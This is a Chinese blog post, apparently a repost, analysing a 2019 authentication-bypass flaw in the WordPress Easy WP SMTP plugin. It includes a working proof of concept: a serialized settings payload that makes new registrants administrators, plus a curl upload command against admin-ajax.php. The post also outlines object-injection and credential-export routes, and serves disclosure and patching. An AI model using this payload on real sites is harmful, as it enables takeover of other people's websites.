wordpress ajax 调用wpdb_又是WordPress——WordPress WP SMTP插件0 day漏洞PoC

最新推荐文章于 2022-08-10 15:57:07 发布
最新推荐文章于 2022-08-10 15:57:07 发布
阅读量235 收藏
点赞数
文章标签: wordpress ajax 调用wpdb wordpress漏洞

6c491223b6bcbd8bc4d465729add23cc.gif

本文介绍研究人员发现的WordPress WP SMTP插件0 day漏洞。

Easy WP SMTP是WordPress中比较常用和受欢迎的插件,安装量超过30万。研究人员发现该插件中存在一个0 day漏洞,允许非认证的用户修改WordPress options或在注入和执行关于恶意动作的代码。

b453cb2f26df119eeed954a16efbbf78.png漏洞

该漏洞存在于version v1.3.9版本中,已经有黑客从2019年3月15日开始利用该漏洞发起攻击活动了。

add_action( 'admin_init', array( $this, 'admin_init' ) );

...

...

function admin_init() {

        if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {

                  add_action( 'wp_ajax_swpsmtp_clear_log', array( $this, 'clear_log' ) );

                  add_action( 'wp_ajax_swpsmtp_self_destruct', array( $this, 'self_destruct_handler' ) );

        }

        //view log file

        if ( isset( $_GET[ 'swpsmtp_action' ] ) ) {

            if ( $_GET[ 'swpsmtp_action' ] === 'view_log' ) {

                 $log_file_name = $this->opts[ 'smtp_settings' ][ 'log_file_name' ];

                 if ( ! file_exists( plugin_dir_path( __FILE__ ) . $log_file_name ) ) {

                     if ( $this->log( "Easy WP SMTP debug log file\r\n\r\n" ) === false ) {

                         wp_die( 'Can\'t write to log file. Check if plugin directory  (' . plugin_dir_path( __FILE__ ) . ') is writeable.' );

                     };

                }

                 $logfile = fopen( plugin_dir_path( __FILE__ ) . $log_file_name, 'rb' );

                 if ( ! $logfile ) {

                     wp_die( 'Can\'t open log file.' );

                 }

                 header( 'Content-Type: text/plain' );

                 fpassthru( $logfile );

                 die;

            }

        }

        //check if this is export settings request

        $is_export_settings = filter_input( INPUT_POST, 'swpsmtp_export_settings', FILTER_SANITIZE_NUMBER_INT );

        if ( $is_export_settings ) {

            $data                                         = array();

            $opts                                         = get_option( 'swpsmtp_options', array() );

            $data[ 'swpsmtp_options' ]                = $opts;

            $swpsmtp_pass_encrypted                         = get_option( 'swpsmtp_pass_encrypted', false );

            $data[ 'swpsmtp_pass_encrypted' ]         = $swpsmtp_pass_encrypted;

            if ( $swpsmtp_pass_encrypted ) {

                 $swpsmtp_enc_key              = get_option( 'swpsmtp_enc_key', false );

                 $data[ 'swpsmtp_enc_key' ]       = $swpsmtp_enc_key;

            }

            $smtp_test_mail                   = get_option( 'smtp_test_mail', array() );

            $data[ 'smtp_test_mail' ]    = $smtp_test_mail;

            $out                                  = array();

            $out[ 'data' ]                   = serialize( $data );

            $out[ 'ver' ]                     = 1;

            $out[ 'checksum' ]                = md5( $out[ 'data' ] );

            $filename = 'easy_wp_smtp_settings.txt';

            header( 'Content-Disposition: attachment; filename="' . $filename . '"' );

            header( 'Content-Type: text/plain' );

            echo serialize( $out );

            exit;

        }

        $is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT );

        if ( $is_import_settings ) {

                  $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );

                  if ( empty( $_FILES[ 'swpsmtp_import_settings_file' ] ) ) {

                         echo $err_msg;

                         wp_die();

                 }

                 $in_raw = file_get_contents( $_FILES[ 'swpsmtp_import_settings_file' ][ 'tmp_name' ] );

                 try {

                         $in = unserialize( $in_raw );

                         if ( empty( $in[ 'data' ] ) ) {

                                   echo $err_msg;

                                   wp_die();

                         }

                         if ( empty( $in[ 'checksum' ] ) ) {

                                   echo $err_msg;

                                   wp_die();

                         }

                         if ( md5( $in[ 'data' ] ) !== $in[ 'checksum' ] ) {

                                   echo $err_msg;

                                   wp_die();

                         }

                         $data = unserialize( $in[ 'data' ] );

                         foreach ( $data as $key => $value ) {

                                   update_option( $key, $value );

                         }

                         set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 );

                         $url = admin_url() . 'options-general.php?page=swpsmtp_settings';

                         wp_safe_redirect( $url );

                         exit;

                 } catch ( Exception $ex ) {

                         echo $err_msg;

                         wp_die();

                 }

        }

}

当用户访问admin域时,是来自easy-wp-smtp.php脚本的admin_init()函数通过admin_init hook运行的。该函数可以用来查看或删除日志,导出或导入插件配置并在WordPress数据库中更新option。但是并不检查用户的能力,因此任意登陆的用户都可以触发该漏洞。但非认证的用户也可以执行,因为Easy WP SMTP使用AJAX和admin_init hook在admin-ajax.php上运行:

而且不仅仅是在用户层的admin屏管理的,也可以运行在admin-ajax.php和admin-post.php。

因此,非认证的用户可以发送ajax请求来触发上面的函数和执行代码,比如action=swpsmtp_clear_log。

PoC

在下面的PoC中,研究人员使用swpsmtp_import_settings来上传含有恶意序列化payload的文件,payload可以启用用户注册(users_can_register),在数据库中将用户默认角色default_role设置为administrator。

1. 创建一个名为“/tmp/upload.txt”的文件并加入以下内容:

a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

2. 上传该文件:

$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'

其他漏洞可以这样利用:

· 通过PHP对象注入执行远程代码,因为Easy WP SMTP使用不安全的 unserialize()调用。

· 查看或删除日志或其他任意文件,因为黑客可以修改日志的文件名。

· 导出含有SMTP主机、用户名和密码的插件配置数据,并用来发送垃圾邮件。

研究人员通过防火墙记录数据发现,黑客利用该漏洞来修改WordPress wp_user_roles 选项的内容,并给予所有用户管理员功能。黑客并没有创建新的管理员账户,因为这在WordPress “Users”区域很容易会被发现。

Wordpress在3月17日发布了version 1.3.9.1新版本,已经修复了该漏洞。

更多参见漏洞利用情况参见:

· https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/

· https://blog.nintechnet.com/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin/

a82ff8f5fb786e37c0cfa26f29eac154.png

9610178473036b67fd3dbf32da023020.png

weixin_39850143
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wordpresd免登录发布接口php_WordPress钩子为admin-ajax.php注册接口替代接口文件
weixin_36264801的博客
12-30 257
重要:本文最后更新于2019-05-21 08:35:25,某些文章具有时效性,若有错误或已失效,请在下方留言或联系代码狗。在制作WordPress主题或者件的时候,我们经常会使用到一种局部网页刷新功能ajax,了解前端的人都知道,通过ajax发送请求取得数据,然后修改局部网页内容,实现无刷新网页刷新数据,可以非常有效的提高用户体验。要实现这个功能并不是那么简单,你需要书写前端js发送ajax请...
wordpress使用ajax提交数据库,使用wordpress的$wpdb类读mysql数据库做ajax时出现的问题该如何解决...
weixin_35656458的博客
08-05 161
无聊做了个www.jiazhuangma.com,技术不过关写不好后台,就想直接读wordpress里的数据。做ajax读后台数据时在网上随便搜了一段代码使用wordpress $wpdb类读mysql数据库,就是这么一随便,搜到了别人的去头去尾的code,开始了我的改错之旅。主要问题有:1,non-object2,json中汉字,/被转码3,chrome可以正常访问php文件,ie显示http ...
wordpress 黑客_如何通过黑客删除WordPress重定向-查看Easy WP SMTP漏洞
cumian8165的博客
08-06 583
wordpress 黑客by Atman Rathod 由Atman Rathod 如何通过黑客删除WordPress重定向-查看Easy WP SMTP漏洞 (How to remove WordPress redirects by hackers — a look at the Easy WP SMTP plugin vulnerability) I believe you would...
wordpress adminajax.php,wordpress 中使用自带 admin-ajax.php
weixin_34861192的博客
03-27 619
1前端页面jQuery.ajax({type: 'POST',url: "",data: {action: 'myajax_submit'},success: function(res) {console.log(JSON.stringify("--"+res));}});2 后端functions.php里面接受请求add_action( 'wp_ajax_nopriv_myajax_submi...
wordpress 中使用自带 admin-ajax.php
weixin_34160277的博客
06-23 337
2019独角兽企业重金招聘Python工程师标准>>> ...
使用wordpress的$wpdb类读mysql数据库做ajax时出现的问题该如何解决
10-23
主要介绍了使用wordpress的$wpdb类读mysql数据库做ajax时出现的问题该如何解决的相关资料,需要的朋友可以参考下
WordPress中利用AJAX技术进行评论提交的实现示例
11-26
add_action('wp_ajax_nopriv_ajax_comment', 'ajax_comment'); ``` 接下来,我们需要在前端页面(通常在评论表单中)添加AJAX调用来触发这个过程。这通常涉及到使用jQuery库来处理AJAX请求。以下是一个简单的示例:...
WordPress 3.5 与 wpdb::prepare() 报错解决办法
01-20
WordPress 3.5 正式发布, 这个版本包括大量更新. 启用了最新的响应式布局默认主题 Twenty Twelve; 改版了 Admin 界面, 更加简洁而且针对移动设备进行了优化; Media 功能也得到极大的提高, 现在更加没有理由使用其他...
WordPress修改改文章状态:wp_publish_post()
01-20
用法:通过do_action() 调用一下函数 $post_id和$post(文章相关数据): edit_post() save_post() wp_insert_post()【修改记录】 自2.1.0版本后 【源文件】 wp_publish_post()位于wp-includes/post.php中。 /** *...
wordpressajax 接口:admin-ajax.php 的利用
热门推荐
雁过留痕
03-16 1万+
【引子】 我想实现wordpress的无刷新登录,想到可以用ajax读取用户的提交的表单,然后post给wp-login.php处理,结果被wp-login.php拒绝了,报了权限错误,一开始一直在想解决权限的问题,但是总是会去修改wp-login.php(这样会破坏文件原来的结构,不是我想要的)。后面找到了admin-ajax.php。 【正文】 在wordpress上实现ajax,可以通
wpadmin adminajax.php,在WordPress 4.9中显示来自admin-ajax.php的PHP错误
weixin_29352517的博客
03-22 968
我们已经设置了一些自定义端点来执行各种操作,这些端点可以通过/wp/wp-admin/admin-ajax.php?action=some_action访问但是,无论何时在开发过程中出现错误(例如语法,逻辑错误,致命错误等)时,在浏览器中查看页面时,我们都只会收到“ 500 Internal Server Error”.该站点上的每个其他页面出现错误时,都会向我们显示PHP错误,以帮助我们进行调试...
admin.php wordpress,Wordpress admin-ajax.php远程SQL注入漏洞
weixin_28718769的博客
03-11 1245
WordPress是一款免费的论坛Blog系统。WordPress实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击非授权访问数据库。WordPresswp-admin/admin-ajax.php文件没有正确验证对cookie参数的输入。在wp-admin/admin-ajax.php的6行:------------------[source code]------------...
ajax php die,【Wordpress】使用 admin-ajax.php 实现ajax请求 | 碎念
weixin_31321851的博客
03-10 831
写在前面:最近想给自己的博客实现一个 站内搜索 功能,期望整个过程异步实现。这样用户体验度更好。遇到问题:如何实现文章的模糊匹配?wordpress 如何提供接口?页面如何实现异步请求接口数据,并完成页面的渲染?问题1 – 模糊搜索:大胆尝试:wordpress 原生自带有一个 wp_query 函数,它支持的参数非常完善灵活,实现整个网站与数据库的交互。比如调用最新文章、热门文章、自定义文章类型...
wordpresd免登录发布接口php_实现wordpressajax接口请求学会admin-ajax.php的利用
weixin_39807691的博客
12-21 281
摘要:wordpress无刷新登录,想通过ajax读取用户提交的表单,结果被wp-login.php拒绝了,一开始一直在想解决...wordpress无刷新登录,想通过ajax读取用户提交的表单,结果被wp-login.php拒绝了,一开始一直在想解决权限的问题,但是总是会去修改wp-login.php,后面找到了admin-ajax.php。在wordpress上实现ajax,可以通过前端代码后...
WordPress缓存件导致admin-ajax.php 403的解决方案
zl5186888的博客
08-10 885
admin-ajax.php 是 WordPress 用于Ajax请求的必需文件,在使用缓存件的情况下,如果你的网站使用了Ajax请求网站数据,可能会时不时出现 admin-ajax.php 403 的情况,怎样确定 admin-ajax.php 403 是不是因为缓存件导致的呢?其他缓存件就不介绍了,总之就是找到自动清理缓存的设置选项,设置自动清理缓存的时间不超过12小时,应该就可以了。后台缓存件中清空缓存,然后到浏览器中随便访问网站的一个页面,F12 打开调试模式。...
13个WordPress速度优化件(Plugin)推荐
That's why you go away
04-19 6041
谁都希望自己的网站越快越好,不仅提升访客的体验,还能提高搜索引擎的排名,可谓一举两得。WordPress 有很多件都可以提升网站的速度,这里就给大家推荐一些比较流行而且实用的加速件。 一、WP Rocket 缓存是服务器以外对网站速度影响最明显的一个因素。缓存件是提升 WordPress 网站速度的一把利器,效果立竿见影。缓存件除了加速外,还能减轻服务器负担,节省资源,实在是居家旅...
wordpress admin-ajax.php 漏洞,wordpress 中使用自带 admin-ajax.php
weixin_39859715的博客
03-19 803
1前端页面jQuery.ajax({type: 'POST',url: "",data: {action: 'myajax_submit'},success: function(res) {console.log(JSON.stringify("--"+res));}});2 后端functions.php里面接受请求add_action( 'wp_ajax_nopriv_myajax_submi...
wordpress仪表盘漏洞
最新发布
09-05
根据引用,在WordPress的4.8.2及之前的版本中,存在一个SQL注入漏洞,该漏洞由于$wpdb编码不规范,导致可以接收和执行不安全的查询,从而导致潜在的SQL注入,存在高安全风险。这个漏洞可以通过PoC进行远程利用。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值